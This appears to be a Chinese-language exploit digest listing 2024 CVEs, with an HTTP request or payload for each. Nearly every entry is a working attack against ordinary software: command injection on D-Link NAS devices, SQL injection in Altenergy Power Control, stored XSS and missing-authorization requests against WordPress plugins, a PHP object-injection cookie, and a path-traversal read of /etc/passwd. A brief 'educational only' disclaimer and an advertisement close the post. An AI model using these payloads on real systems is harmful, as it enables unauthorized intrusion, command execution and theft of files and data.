⚠️ 漏洞
✅ CVE-2024-10914
在D-Link DNS-320、DNS-320LW、DNS-325和DNS-340L中发现的漏洞,版本直到20241028
GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1
✅ CVE-2024-11305
在Altenergy Power Control Software中发现的关键漏洞,版本直到20241108
POST /index.php/display/status_zigbee HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
date=2024-11-06%' UNION ALL SELECT 11,CHAR(113)CHAR(75,101,86,69,115,83,113,89,100,122,121,102,83,83,113,86,84,112,100,103,69,75,80,117,88,109,83,105,89,116,110,120,76,84,73,109,115,100,83,107)CHAR(113,118,98,98,113),11-- wPIB
✅ CVE-2024-10793
WP Security Audit Log插件检测 一个允许注入恶意脚本的XSS漏洞。.
curl -X POST 'http://example.com/wp-admin/admin-ajax.php' \
-d 'action=destroy-sessions&user_id=<script>alert("XSS found windz3r0day")</script>'
✅ CVE-2024-11199
通过插件的rescue_progressbar短代码进行的存储跨站脚本攻击
[rescue_progressbar visibility='foo" onclick="alert(/XSS/)"']
✅ CVE-2024-11381
通过插件的ch_registro短代码进行的存储跨站脚本攻击
[ch_registro note='"onmouseover="alert(/XSS/)"']
✅ CVE-2024-43919
**YARPP <= 5.30.10 - 缺少授权
该漏洞允许未经授权访问以修改展示类型。.
GET /wp-content/plugins/yet-another-related-posts-plugin/includes/yarpp_pro_set_display_types.php?ypsdt=false&types[]=post&types[]=page HTTP/1.1
Host: example.com
✅ CVE-2024-52433
My Geo Posts Free <= 1.2 - 未经认证的PHP对象注入
GET / HTTP/2
Host: wp-dev.ddev.site
Cookie: mgpf_geo_coockie=TzoyMDoiUEhQX09iamVjdF9JbmplY3Rpb24iOjA6e30=
✅ CVE-2024-9935
Elementor页面构建器的PDF生成插件 <= 1.7.5 - 未经认证的任意文件下载
GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Priority: u=0, i
▶▶▶ 免责声明
仅用于教育目的。在未获得明确许可的情况下对系统或网站使用这些漏洞是非法的。作者对任何使用这些信息所产生的后果不负责任。
广告
全网最强大的网络安全资源大全:棉花糖会员站介绍(24年10月4日版本)